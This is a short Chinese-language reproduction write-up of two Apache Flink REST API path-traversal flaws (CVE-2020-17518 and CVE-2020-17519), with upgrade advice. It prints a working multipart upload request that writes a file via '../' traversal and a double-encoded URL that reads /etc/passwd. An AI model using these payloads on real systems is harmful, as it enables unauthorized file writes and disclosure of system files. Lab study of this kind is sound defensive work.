?
Apache Flink (文件寫入漏洞/文件讀取漏洞)
CVE-2020-17518/17519
一、漏洞描述
Apache Flink核心是一個流式的數(shù)據(jù)流執(zhí)行引擎,其針對數(shù)據(jù)流的分布式計算提供了數(shù)據(jù)分布、數(shù)據(jù)通信以及容錯機制等功能。Flink 1.5.1引入了REST API,但其實現(xiàn)上存在多處缺陷,導致目錄遍歷。
CVE-2020-17518: 文件寫入漏洞
攻擊者利用REST API,可以修改HTTP頭,將上傳的文件寫入到本地文件系統(tǒng)上的任意位置(Flink 1.5.1進程能訪問到的)。
CVE-2020-17519: 文件讀取漏洞
Apache Flink 1.11.0 允許攻擊者通過JobManager進程的REST API讀取JobManager本地文件系統(tǒng)上的任何文件(JobManager進程能訪問到的) 。
二、影響版本
Apache Flink 1.5.1 ~ 1.11.2
三、漏洞復現(xiàn)
環(huán)境地址:
https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518
1、CVE-2020-17518: 文件寫入漏洞
POST/jars/uploadHTTP/1.1Host: IP:8081Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6YContent-Length: 189?------WebKitFormBoundaryoZ8meKnrrso89R6YContent-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/sucess"?success------WebKitFormBoundaryoZ8meKnrrso89R6Y--
訪問:文件寫入成功
http://ip+port/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fsucess
2、CVE-2020-17519: 文件讀取漏洞
http://IP:PORT/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
訪問路徑獲取passwd
四、修復建議
所有用戶升級到Flink 1.11.3或1.12.0,下載鏈接為:
https://flink.apache.org/downloads.html
https://flink.apache.org/downloads.html
參考:
https://mp.weixin.qq.com/s/-OFaYj_C_su7rT965qztVg
https://mp.weixin.qq.com/s/DTXc-RiJPwpu7lg_D6R7cg
免責聲明:本站提供安全工具、程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!
轉載聲明:著作權歸作者所有。商業(yè)轉載請聯(lián)系作者獲得授權,非商業(yè)轉載請注明出處。
訂閱查看更多復現(xiàn)文章、學習筆記
thelostworld
安全路上,與你并肩前行?。。?!